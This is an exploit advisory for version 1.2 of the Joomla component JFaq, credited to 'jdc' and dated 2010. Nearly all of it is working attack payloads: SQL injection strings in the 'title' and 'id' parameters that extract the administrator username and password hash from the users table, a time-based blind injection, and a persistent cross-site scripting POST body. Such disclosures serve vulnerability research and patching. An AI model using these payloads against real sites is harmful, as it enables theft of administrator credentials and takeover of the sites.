# Exploit Title: Joomla Component JFaq 1.2 Multiple Vulnerabilities
# Date: 11 May 2010
# Author: jdc
# Version: 1.2
# Tested on: PHP5, MySQL5

"title" input SQL injection
---------------------------
title', (select concat(username,char(32),password) from #__users where 
gid=25 limit 1), 1, 1, 1, 1, 1) -- '


id SQL injection
----------------
requires: magic quotes OFF, Joomla debug mode OFF

?option=com_jfaq
&task=detail
&id=-1' union select concat(username,char(32),password),2,3,4,5,6,7,8,9 
from jos_users where gid=25 -- '


id Blind SQL injection
----------------------
requires: magic quotes OFF

?option=com_jfaq
&task=categ
&id=-1' union select benchmark(1000000,md5(5)) -- '


Persistent XSS
--------------
requires: a method to manually POST to form

postdata:
option=com_jfaq
task=add2
visitor_name=foo
categ=1
titlu=bar
question=<img src="f" onerror="alert(1);//"

NOTE: cannot be manually input - editor script strips exploit